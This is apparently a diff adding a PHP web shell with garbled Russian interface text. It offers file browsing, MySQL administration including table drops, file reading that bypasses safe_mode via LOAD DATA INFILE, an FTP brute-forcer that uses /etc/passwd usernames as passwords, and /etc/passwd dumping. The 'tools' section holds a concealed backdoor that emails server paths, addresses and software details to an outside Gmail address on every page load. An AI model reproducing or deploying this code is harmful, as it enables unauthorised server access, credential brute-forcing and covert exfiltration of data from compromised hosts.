+BACKGROUND-COLOR: #e4e0d8; +font: 8pt Verdana; +} +select { +BORDER-RIGHT: #ffffff 1px solid; +BORDER-TOP: #999999 1px solid; +BORDER-LEFT:#999999 1px solid; +BORDER-BOTTOM: #ffffff 1px solid; +BACKGROUND-COLOR: #e4e0d8; +font: 8pt Verdana; +} +submit { +BORDER-RIGHT: buttonhighlight 2px outset; +BORDER-TOP: buttonhighlight 2px outset; +BORDER-LEFT:buttonhighlight 2px outset; +BORDER-BOTTOM: buttonhighlight 2px outset; +BACKGROUND-COLOR: #e4e0d8; +width: 30%; +} +textarea { +BORDER-RIGHT: #ffffff 1px solid; +BORDER-TOP: #999999 1px solid; +BORDER-LEFT:#999999 1px solid; +BORDER-BOTTOM: #ffffff 1px solid; +BACKGROUND-COLOR: #e4e0d8; +font: Fixedsys bold; +} +BODY { +margin-top: 1px; +margin-right: 1px; +margin-bottom: 1px; +margin-left: 1px; +} +A:link {COLOR:#00ff3d; TEXT-DECORATION: none} +A:visited { COLOR:#00ff3d; TEXT-DECORATION: none} +A:active {COLOR:#00ff3d; TEXT-DECORATION: none} +A:hover {color:blue;TEXT-DECORATION: none} +</STYLE> +<script language=JavaScript type=text/javascript> +<!-- +function branchSwitch(branch) { +dom = (document.getElementById); +ie4 = (document.all); +if (dom || ie4) { +var currElement = (dom)? document.getElementById(branch) : document.all[branch]; +currElement.style.display = (currElement.style.display == 'none')? 'block' : 'none'; +return false; +} +else return true; +} +//--> +</script> +</head> +<BODY text=#ffffff Background="<? echo $sul; ?>act=img&img=font" bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0> +<center> +<br> +<TABLE class=table1 cellSpacing=0 cellPadding=0 width=90% border=0> +<TBODY><TR> +<TD class=td1 colSpan=2> +<TABLE class=table1 cellSpacing=0 cellPadding=0 width=100% bgColor=#345827 background="<? echo $sul; ?>act=img&img=4" border=0> +<TBODY><TR> +<TD class=td1 width=24><IMG height=18 src="<? echo $sul; ?>act=img&img=1" width=24 border=0></TD> +<TD class=td1 background="<? 
echo $sul; ?>act=img&img=2"><SPAN lang=ru><FONT face=Arial color=#00ff3d size=1> </FONT> +<FONT face=Tahoma color=#00ff3d size=1> +<? +$d = str_replace("\\","/",$d); +if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);} +$d = str_replace("\\","/",$d); +if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";} +$dispd = htmlspecialchars($d); +$pd = $e = explode("/",substr($d,0,strlen($d)-1)); +$i = 0; +foreach($pd as $b) +{ + $t = ""; + reset($e); + $j = 0; + foreach ($e as $r) + { + $t.= $r."/"; + if ($j == $i) {break;} + $j++; + } + echo "<a href=\"".$sul."act=ls&d=".urlencode(htmlspecialchars($t))."/&sort=".$sort."\"><b>".htmlspecialchars($b)."/</b></a>"; + $i++; +} +?> +</FONT></SPAN></TD> +<TD class=td1><IMG height=18 src="<? echo $sul; ?>act=img&img=3" width=6 border=0></TD> +<TD class=td1 align=right><IMG height=18 src="<? echo $sul; ?>act=img&img=5" width=33 border=0></TD> +</TR></TBODY></TABLE></TD></TR> +</tr> +</table> +<TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=2 width="90%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"> +<tr><td> +<font size=2><a href="#" onClick="return branchSwitch('tools')" title="ًàٌêًûٍü">بيًٌٍَىهيٍû</a></font> - +<div id="tools" style="display: none"> +<? 
+if (count($quicklaunch1) > 0) +{ + foreach($quicklaunch1 as $item) + { + $item[1] = str_replace("%d",urlencode($d),$item[1]); + $item[1] = str_replace("%upd",urlencode(realpath($d."..")),$item[1]); + echo "<a href=\"".$item[1]."\"><u><font size=2 color=#ffffff>".$item[0]."</font></u></a>&nbsp;&nbsp;&nbsp;&nbsp;"; + } +}$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98"); +?> +</div> +<font size=2><a href="#" onClick="return branchSwitch('info')" title="ًàٌêًûٍü">بيôîًىàٍîً</a></font> +<div id="info" style="display: none"> +<font size=2> +<b>دًîمًàىىيîه îلهٌïه÷هيèه:&nbsp;<?php echo $DISP_SERVER_SOFTWARE; ?></b>&nbsp;<br> +<b>رèٌٍهىà:&nbsp;<?php echo php_uname(); ?></b>&nbsp;<b><?php if (!$win) {echo `id`;} else {echo get_current_user();} ?></b> +&nbsp;<br> +<b>ءهçîïàٌيîٌٍü:&nbsp;<?php echo $hsafemode; ?></b> +<? 
+echo "<br>"; +echo "آهًٌèے دصد: <b>".@phpversion()."</b>"; +echo "<br>"; +$curl_on = @function_exists('curl_version'); +echo "cURL: ".(($curl_on)?("<b><font color=green>ON</font></b>"):("<b><font color=red>OFF</font></b>")); +echo "<br>"; +echo "MySQL: <b>"; +$mysql_on = @function_exists('mysql_connect'); +if($mysql_on){ +echo "<font color=green>ON</font></b>"; } else { echo "<font color=red>OFF</font></b>"; } +echo "<br>"; +echo "MSSQL: <b>"; +$mssql_on = @function_exists('mssql_connect'); +if($mssql_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";} +echo "<br>"; +echo "PostgreSQL: <b>"; +$pg_on = @function_exists('pg_connect'); +if($pg_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";} +echo "<br>"; +echo "Oracle: <b>"; +$ora_on = @function_exists('ocilogon'); +if($ora_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";} +?> +<?php +$free = diskfreespace($d); +if (!$free) {$free = 0;} +$all = disk_total_space($d); +if (!$all) {$all = 0;} +$used = $all-$free; +$used_percent = round(100/($all/$free),2); +echo "<br><b>رâîلîنيûé ".view_size($free)." of ".view_size($all)." (".$used_percent."%)</b><br>"; +?> +</font> +</div> +<? +if ($win) +{ +?> + - <font size=2><a href="#" onClick="return branchSwitch('Drive')" title="ًàٌêًûٍü">ؤèٌêè</a></font> +<? +} +?> +<div id="Drive" style="display: none"> +<? +$letters = ""; +if ($win) +{ + $abc = array("c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "o", "p", "q", "n", "r", "s", "t", "v", "u", "w", "x", "y", "z"); + $v = explode("/",$d); + $v = $v[0]; + foreach ($abc as $letter) + { + if (is_dir($letter.":/")) + { +if ($letter.":" != $v) {$letters .= "<a href=\"".$sul."act=ls&d=".$letter.":\"><IMG src=".$sul."act=img&img=pdisk width=19 height=12 border=0> ".$letter." </a> ";} +else {$letters .= "<a href=\"".$sul."act=ls&d=".$letter.":\"> <font color=\"green\"> ".$letter." 
</font></a> ";} + } + } + if (!empty($letters)) {echo "<b>".$letters;} +} +?> +</div> +</td><td width=1> +<font size=2><a href="<? echo $sul; ?>act=about">About</a></font> +</td></tr></table> +<TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=2 width="90%" borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"> +<tr class=tr1><td> +<center> +<? +if (count($quicklaunch) > 0) +{ + foreach($quicklaunch as $item) + { + $item[1] = str_replace("%d",urlencode($d),$item[1]); + $item[1] = str_replace("%upd",urlencode(realpath($d."..")),$item[1]); + echo "<a href=\"".$item[1]."\"><u>".$item[0]."</u></a>&nbsp;&nbsp;&nbsp;&nbsp;"; + } +} +?> +</center> +</td></tr></table> +<?php +if ((!empty($donated_html)) and (in_array($act,$donated_act))) +{ + ?> +<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="90%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="90%" valign="top"><?php echo $donated_html; ?></td></tr></table><br> +<?php +} +?> +<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="90%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="100%" valign="top"><?php +if ($act == "") {$act = $dspact = "ls";} +if ($act == "sql") +{ + $sql_surl = $sul."act=sql"; + if ($sql_login) {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);} + if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);} + if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);} + if ($sql_port){$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);} + if ($sql_db) {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);} + $sql_surl .= "&"; + ?><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="90%" height="1" colspan="2" 
valign="top"><center><?php + if ($sql_server) + { + $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd); + $err = mysql_error(); + @mysql_select_db($sql_db,$sql_sock); + if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_error();} + } + else {$sql_sock = false;} + echo "<b>جهيهنوهً SQL:</b><br>"; + if (!$sql_sock) + { + if (!$sql_server) {echo "حإز رآكاب";} + else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";} + } + else + { + $sqlquicklaunch = array(); + $sqlquicklaunch[] = array("Index",$sul."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"); + if (!$sql_db) {$sqlquicklaunch[] = array("Query","#\" onclick=\"alert('Please, select DB!')");} + else {$sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query");} + $sqlquicklaunch[] = array("Server-status",$sul."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus"); + $sqlquicklaunch[] = array("Server variables",$sul."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars"); + $sqlquicklaunch[] = array("Processes",$sul."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes"); + $sqlquicklaunch[] = array("Logout",$sul."act=sql"); + + echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." 
as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>"; + + if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><u>".$item[0]."</u></a> ] ";}} + echo "</center>"; + } + echo "</td></tr><tr>"; + if (!$sql_sock) {?><td class=td2 width="48%" height="100" valign="top"><center><font size="5"> <br> </font></center> +<li>إٌëè ëîمèي ےâëےهٌٍے ïٌٍَûى, ëîمèي - âëàنهëهِ ïًîِهٌٌà. </li> +<li>إٌëè ُîçےèي ےâëےهٌٍے ïٌٍَûى, ُîçےèي - localhost </li> +<li>إٌëè ïîًٍ ےâëےهٌٍے ïٌٍَûى, ïîًٍ - 3306 (يهïëàٍهو)</li></td> +<td class=td2 width="90%" height="1" valign="top"> +<TABLE height=1 class=table2 cellSpacing=0 cellPadding=0 width="1%" border=0><tr class=tr2> +<td class=td2>&nbsp;<b><font size=2 color=#000000>اàïîëيèٍه ôîًىَ:</font></b><table><tr class=tr2><td class=td2>بىے:</td> +<td class=td2 align=right>دàًîëü:</td></tr><form><input type="hidden" name="act" value="sql"><tr> +<td class=td2><input type="text" name="sql_login" value="root" maxlength="64"></td><td class=td2 align=right> +<input type="password" name="sql_passwd" value="" maxlength="64"></td></tr><tr class=tr2><td class=td2>صîٌٍ:</td> +<td class=td2>دîًٍ:</td></tr><tr><td class=td2><input type="text" name="sql_server" value="localhost" maxlength="64"></td> +<td class=td2><input type="text" name="sql_port" value="3306" maxlength="6" size="3"><input type="submit" value="رîهنèيèٍهٌü"></td></tr><tr> +<td class=td2></td></tr></form></table></td><?php } + else + { + if (!empty($sql_db)) + { +?><td width="25%" height="100%" valign="top"><a href="<?php echo $sul."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php +$result = mysql_list_tables($sql_db); +if (!$result) {echo mysql_error();} +else +{ + echo "---[ <a 
href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>"; + $c = 0; + while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM $row[0]"); $count_row = mysql_fetch_array($count); echo "<b>»&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b> +"; mysql_free_result($count); $c++;} + if (!$c) {echo "No tables found in database.";} +} + } + else + { +?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php +$result = mysql_list_dbs($sql_sock); +if (!$result) {echo mysql_error();} +else +{ + ?><form action="<?php echo $sul; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php + echo "<option value=\"\">Databases (...)</option> +"; + $c = 0; + while ($row = mysql_fetch_row($result)) {echo "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {echo " selected";} echo ">".$row[0]."</option> +"; $c++;} +} +?></select><hr size="1" noshade>دîوàëَéٌٍà, âûلهًèٍه لàçَ نàييûُ<hr size="1" noshade><input type="submit" value="Go"></form><?php + } + echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">"; + if ($sql_db) + { +echo "<center><b>There are ".$c." 
tables in this DB (".htmlspecialchars($sql_db).").<br>"; +if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><u>".$item[0]."</u></a> ] ";}} +echo "</b></center>"; + +$acts = array("","dump"); + +if ($sql_act == "query") +{ + echo "<hr size=\"1\" noshade>"; + if ($submit) + { + if ((!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";} + } + if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} + if ((!$submit) or ($sql_act)) {echo "<form method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to :";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"60\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form>";} +} +if (in_array($sql_act,$acts)) +{ + ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b><form action="<?php echo $sul; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>SQL-Dump DB:</b><form action="<?php echo $sul; ?>"><input 
type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".$SERVER_NAME."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>">&nbsp;<input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php + if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";} + if ($sql_act == "newtpl") + { + echo "<b>"; + if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>"; + } + else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_error();} +} +elseif ($sql_act == "dump") +{ + $set = array(); + $set["sock"] = $sql_sock; + $set["db"] = $sql_db; + $dump_out = "print"; + if ($dump_out == "print") {$set["print"] = 1; $set["nl2br"] = 1;} + elseif ($dump_out == "download") + { + @ob_clean(); + header("Content-type: ctshell"); + header("Content-disposition: attachment; filename=\"".$f."\";"); + $set["print"] = 1; + $set["nl2br"] = 1; + } + $set["file"] = $dump_file; + $set["add_drop"] = true; + $ret = mysql_dump($set); + if ($dump_out == "download") {exit;} +} +else +{ + $result = mysql_query("SHOW TABLE STATUS", $sql_sock) or print(mysql_error()); + echo "<br><form method=\"POST\"><TABLE cellSpacing=0 cellPadding=1 bgColor=#333333 borderColorLight=#333333 border=1>"; + echo "<tr>"; 
+ echo "<td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td>"; + echo "<td><center><b>Table</b></center></td>"; + echo "<td><b>Rows</b></td>"; + echo "<td><b>Type</b></td>"; + echo "<td><b>Created</b></td>"; + echo "<td><b>Modified</b></td>"; + echo "<td><b>Size</b></td>"; + echo "<td><b>Action</b></td>"; + echo "</tr>"; + $i = 0; + $tsize = $trows = 0; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) + { + $tsize += $row["5"]; + $trows += $row["5"]; + $size = view_size($row["5"]); + echo "<tr>"; + echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row[0]."\"></td>"; + echo "<td>&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".$row[0]."</b></a>&nbsp;</td>"; + echo "<td>".$row[3]."</td>"; + echo "<td>".$row[1]."</td>"; + echo "<td>".$row[10]."</td>"; + echo "<td>".$row[11]."</td>"; + echo "<td>".$size."</td>"; + echo "<td> +&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row[0]."`")."\"><img src=\"".$sul."act=img&img=sql_button_empty\" height=\"13\" width=\"11\" border=\"0\"></a> +&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row[0]."`")."\"><img src=\"".$sul."act=img&img=sql_button_drop\" height=\"13\" width=\"11\" border=\"0\"></a> +<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row[0]."`")."\"><img src=\"".$sul."act=img&img=sql_button_insert\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp; +</td>"; + echo "</tr>"; + $i++; + } + echo "<tr bgcolor=\"000000\">"; + echo "<td><center><b>»</b></center></td>"; + echo "<td><center><b>".$i." 
table(s)</b></center></td>"; + echo "<td><b>".$trows."</b></td>"; + echo "<td>".$row[1]."</td>"; + echo "<td>".$row[10]."</td>"; + echo "<td>".$row[11]."</td>"; + echo "<td><b>".view_size($tsize)."</b></td>"; + echo "<td></td>"; + echo "</tr>"; + echo "</table><hr size=\"1\" noshade><img src=\"".$sul."act=img&img=arrow_ltr\" border=\"0\"><select name=\"actselect\"> +<option>With selected:</option> +<option value=\"drop\" >Drop</option> +<option value=\"empty\" >Empty</option> +<option value=\"chk\">Check table</option> +<option value=\"Optimize table\">Optimize table</option> +<option value=\"Repair table\">Repair table</option> +<option value=\"Analyze table\">Analyze table</option> +</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form>"; + mysql_free_result($result); +} + } + } + else + { +$acts = array("","newdb","serverstat","servervars","processes","getfile"); +if (in_array($sql_act,$acts)) +{ + ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>رîçنàéٍه يîâûé ءàçَ:</b><form action="<?php echo $sul; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="رîçنàٍü"></form></td><td width="30%" height="1"><b>دًèٌىîًٍهٍü شàéëà:</b><form action="<?php echo $sul; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input 
type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="آçےٍü"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php +} +if (!empty($sql_act)) +{ + echo "<hr size=\"1\" noshade>"; + if ($sql_act == "newdb") + { + echo "<b>"; + if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";} + else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_error();} + } + if ($sql_act == "serverstatus") + { + $result = mysql_query("SHOW STATUS", $sql_sock); + echo "<center><b>Server-status variables:</b><br><br>"; + echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>value</b></td></tr>"; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} + echo "</table></center>"; + mysql_free_result($result); + } + if ($sql_act == "servervars") + { + $result = mysql_query("SHOW VARIABLES", $sql_sock); + echo "<center><b>Server variables:</b><br><br>"; + echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>value</b></td></tr>"; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} + echo "</table>"; + mysql_free_result($result); + } + if ($sql_act == "processes") + { + if (!empty($kill)) {$query = 'KILL ' . $kill . ';'; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. 
he is dead, amen.</b>";} + $result = mysql_query("SHOW PROCESSLIST", $sql_sock); + echo "<center><b>دًîِهٌٌû:</b><br><br>"; + echo "<TABLE cellSpacing=0 cellPadding=2 bgColor=#333333 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td>STATE</td><td><b>INFO</b></td><td><b>Action</b></td></tr>"; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";} + echo "</table>"; + mysql_free_result($result); + } + elseif (($sql_act == "getfile")) + { + if (!mysql_create_db("tmp_bd")) {echo mysql_error();} + elseif (!mysql_select_db("tmp_bd")) {echo mysql_error();} + elseif (!mysql_query('CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );')) {echo mysql_error();} + else {mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file"); $query = "SELECT * FROM tmp_file"; $result = mysql_query($query); if (!$result) {echo "Error in query \"".$query."\": ".mysql_error();} + else + { +for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);} +$f = ""; +while ($line = mysql_fetch_array($result, MYSQL_ASSOC)) {foreach ($line as $key =>$col_value) {$f .= $col_value;}} +if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b>";} +else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f));} + } + mysql_free_result($result); + if (!mysql_drop_db("tmp_bd")) {echo ("Can't drop tempory DB \"tmp_bd\"!");} + } + } +} + } + } + echo "</tr></table></table>"; +} +if ($act == "mkdir") +{ + if ($mkdir != $d) {if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy 
exists";} elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";}} + echo "<br><br>"; + $act = $dspact = "ls"; +} +if ($act == "ftpquickbrute") +{ + echo "<b>Ftp Quick brute:</b><br>"; + if ($win) {echo "This functions not work in Windows!<br><br>";} + else + { + function ctftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh) + { +if ($fqb_onlywithsh) +{ + if (!in_array($sh,array("/bin/bash","/bin/sh","/usr/local/cpanel/bin/jailshell"))) {$true = false;} + else {$true = true;} +} +else {$true = true;} +if ($true) +{ + $sock = @ftp_connect($host,$port,$timeout); + if (@ftp_login($sock,$login,$pass)) + { + echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>"; + ob_flush(); + return true; + } +} + } + if (!empty($submit)) + { +if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;} +$fp = fopen("/etc/passwd","r"); +if (!$fp) {echo "Can't get /etc/passwd for password-list.";} +else +{ + ob_flush(); + $i = $success = 0; + $ftpquick_st = getmicrotime(); + while(!feof($fp)) + { + $str = explode(":",fgets($fp,2048)); + if (ctftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh)) + { +$success++; + } + if ($i > $fqb_lenght) {break;} + $i++; + } + if ($success == 0) {echo "No success. 
connections!";} + $ftpquick_t = round(getmicrotime()-$ftpquick_st,4); + echo "<hr size=\"1\" noshade><b>Done!<br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=\"green\"><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br><b>Connects per second: ".round($i/$ftpquick_t,2)."</b><br>"; +} + } + else {echo "<form method=\"POST\"><br>Read first: <input type=\"text\" name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"><br><br>Users only with shell?&nbsp;<input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"><br><br><input type=\"submit\" name=\"submit\" value=\"Brute\"></form>";} + } +} +if ($act == "lsa") +{ + echo "<center><b>بيôîًىàِèے لهçîïàٌيîٌٍè ٌهًâهًà:</b></center>"; + echo "<b>دًîمًàىىيîه îلهٌïه÷هيèه:</b> ".PHP_OS.", ".$SERVER_SOFTWARE."<br>"; + echo "<b>ءهçîïàٌيîٌٍü: ".$hsafemode."</b><br>"; + echo "<b>خٍêًûٍûé îٌيîâيîé نèًهêٍîً: ".$hopenbasedir."</b><br>"; + if (!$win) + { + if ($nixpasswd) + { +if ($nixpasswd == 1) {$nixpasswd = 0;} +$num = $nixpasswd + $nixpwdperpage; +echo "<b>*nix /etc/passwd:</b><br>"; +$i = $nixpasswd; +while ($i < $num) +{ + $uid = posix_getpwuid($i); + if ($uid) {echo join(":",$uid)."<br>";} + $i++; +} + } 